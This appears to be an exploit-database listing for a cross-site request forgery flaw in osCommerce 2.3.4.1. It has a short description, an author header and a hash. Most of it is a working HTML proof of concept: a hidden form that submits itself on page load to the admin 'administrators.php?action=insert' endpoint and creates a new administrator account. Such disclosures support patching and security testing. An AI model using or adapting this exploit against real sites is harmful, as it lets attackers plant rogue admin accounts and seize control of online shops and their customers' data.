osCommerce 2.3.4.1 Cross Site Request Forgery

osCommerce version 2.3.4.1 suffers from a cross site request forgery vulnerability.


MD5 | 5ba0559ccd442984dcf1d43dc23a2084

 # Exploit Title: osCommerce Add Admin User CSRF Vulnerability
# Exploit Author: Hesam Bazvand
# Contact: [email protected]
# Download Link: https://www.oscommerce.com/Products&Download=oscom2341
# Tested on: Windows 10 / Kali Linux
# Category: WebApps
*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#

exploit:

<html>
<form name="administrator" action="
http://localhost/osCommerce/admin/administrators.php?action=insert"
method="post">
<input type="hidden" name="username" value="secuser" />
<input type="hidden" name="password" value="Your" />
<input type="hidden" name="htaccess" value="false" />
<body name="administrator" onLoad="document.administrator.submit();"></body>
</form>
</html>

Related Posts